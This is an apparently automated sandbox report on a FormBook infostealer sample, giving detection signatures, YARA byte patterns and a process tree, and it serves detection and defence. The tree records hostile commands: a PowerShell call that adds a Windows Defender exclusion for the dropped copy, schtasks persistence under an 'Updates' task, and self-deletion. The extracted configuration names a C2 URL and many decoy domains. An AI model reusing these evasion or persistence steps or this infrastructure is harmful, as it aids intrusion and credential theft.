Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Analysis ID:	1482965
MD5:	01fbcc6559c010e59be1dc7b66c12e4f
SHA1:	657f058d4032447658f71265803f7a6d52a64532
SHA256:	ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe (PID: 6316 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe" MD5: 01FBCC6559C010E59BE1DC7B66C12E4F)

powershell.exe (PID: 2612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4140 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 1708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

autoconv.exe (PID: 5712 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)

rundll32.exe (PID: 3236 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 6792 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

autochk.exe (PID: 3192 cmdline: "C:\Windows\SysWOW64\autochk.exe" MD5: FC398299F54290D5F35C69E865FD7CC2)

rundll32.exe (PID: 5360 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

KfYvtUBOq.exe (PID: 3360 cmdline: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe MD5: 01FBCC6559C010E59BE1DC7B66C12E4F)

schtasks.exe (PID: 3872 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dunia188j.store/gy15/"], "decoy": ["yb40w.top", "286live.com", "poozonlife.com", "availableweedsonline.com", "22926839.com", "petlovepet.fun", "halbaexpress.com", "newswingbd.com", "discountdesh.com", "jwoalhbn.xyz", "dandevonald.com", "incrediblyxb.christmas", "ailia.pro", "ga3ki3.com", "99812.photos", "richiecom.net", "ummahskills.online", "peakleyva.store", "a1cbloodtest.com", "insurancebygarry.com", "onz-cg3.xyz", "erektiepil.com", "hs-steuerberater.info", "20allhen.online", "mariaslakedistrict.com", "losterrrcossmpm.com", "tmb6x.rest", "bagelsliders.com", "njoku.net", "tatoways.com", "jmwmanglobalsolutionscom.com", "midnightemporium.shop", "gunaihotels.com", "midsouthhealthcare.com", "rtptt80.site", "carmen-asa.com", "gypsyjudyscott.com", "djkleel.com", "sophhia.site", "tqqft8l5.xyz", "00050385.xyz", "oiupa.xyz", "purenutrixion.com", "worldinfopedia.com", "8886493.com", "1e0bfijiz43k6c8.skin", "bunkerlabsgolf.com", "twinportslocal.com", "ttyijlaw.com", "poiulkj.top", "yuejiazy888.com", "betbox2347.com", "gettingcraftywitro.com", "mantap303game.icu", "skillspartner.net", "cbla.info", "rs-alohafactorysaleuua.shop", "bt365434.com", "redrivercompany.store", "abc8win5.com", "46431.club", "vivehogar.net", "menloparkshop.com", "1776biz.live"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6ec1:$a1: 3C 30 50 4F 53 54 74 09 40 0x352e1:$a1: 3C 30 50 4F 53 54 74 09 40 0x62701:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d840:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4bc60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x79080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb63f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x39a5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x66e7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16527:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44947:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71d67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa578:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38998:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38c12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65db8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x66032:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16325:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44745:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15e11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x44231:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71651:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16427:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44847:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1659f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x449bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb20a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3962a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x66a4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x194c9:$sqlite3step: 68 34 1C 7B E1 0x195dc:$sqlite3step: 68 34 1C 7B E1 0x478e9:$sqlite3step: 68 34 1C 7B E1 0x479fc:$sqlite3step: 68 34 1C 7B E1 0x74d09:$sqlite3step: 68 34 1C 7B E1 0x74e1c:$sqlite3step: 68 34 1C 7B E1 0x194f8:$sqlite3text: 68 38 2A 90 C5 0x1961d:$sqlite3text: 68 38 2A 90 C5 0x47918:$sqlite3text: 68 38 2A 90 C5 0x47a3d:$sqlite3text: 68 38 2A 90 C5 0x74d38:$sqlite3text: 68 38 2A 90 C5 0x74e5d:$sqlite3text: 68 38 2A 90 C5 0x1950b:$sqlite3blob: 68 53 D8 7F 8C 0x19633:$sqlite3blob: 68 53 D8 7F 8C 0x4792b:$sqlite3blob: 68 53 D8 7F 8C 0x47a53:$sqlite3blob: 68 53 D8 7F 8C 0x74d4b:$sqlite3blob: 68 53 D8 7F 8C 0x74e73:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6be1:$a1: 3C 30 50 4F 53 54 74 09 40 0x35001:$a1: 3C 30 50 4F 53 54 74 09 40 0x62421:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d560:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b980:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78da0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb35f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3977f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x66b9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16247:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44667:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71a87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa298:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa512:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x386b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38932:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16045:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44465:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15b31:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43f51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16147:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44567:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x162bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x446df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaf2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3934a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6676a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x191e9:$sqlite3step: 68 34 1C 7B E1 0x192fc:$sqlite3step: 68 34 1C 7B E1 0x47609:$sqlite3step: 68 34 1C 7B E1 0x4771c:$sqlite3step: 68 34 1C 7B E1 0x74a29:$sqlite3step: 68 34 1C 7B E1 0x74b3c:$sqlite3step: 68 34 1C 7B E1 0x19218:$sqlite3text: 68 38 2A 90 C5 0x1933d:$sqlite3text: 68 38 2A 90 C5 0x47638:$sqlite3text: 68 38 2A 90 C5 0x4775d:$sqlite3text: 68 38 2A 90 C5 0x74a58:$sqlite3text: 68 38 2A 90 C5 0x74b7d:$sqlite3text: 68 38 2A 90 C5 0x1922b:$sqlite3blob: 68 53 D8 7F 8C 0x19353:$sqlite3blob: 68 53 D8 7F 8C 0x4764b:$sqlite3blob: 68 53 D8 7F 8C 0x47773:$sqlite3blob: 68 53 D8 7F 8C 0x74a6b:$sqlite3blob: 68 53 D8 7F 8C 0x74b93:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xad2:$a2: pass 0xad8:$a3: email 0xadf:$a4: login 0xae6:$a5: signin 0xaf7:$a6: persistent 0xcca:$r1: C:\Users\user\AppData\Roaming\7L540QVE\7L5log.ini
0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18859:$sqlite3step: 68 34 1C 7B E1 0x1896c:$sqlite3step: 68 34 1C 7B E1 0x18888:$sqlite3text: 68 38 2A 90 C5 0x189ad:$sqlite3text: 68 38 2A 90 C5 0x1889b:$sqlite3blob: 68 53 D8 7F 8C 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x111:$a1: 3C 30 50 4F 53 54 74 09 40
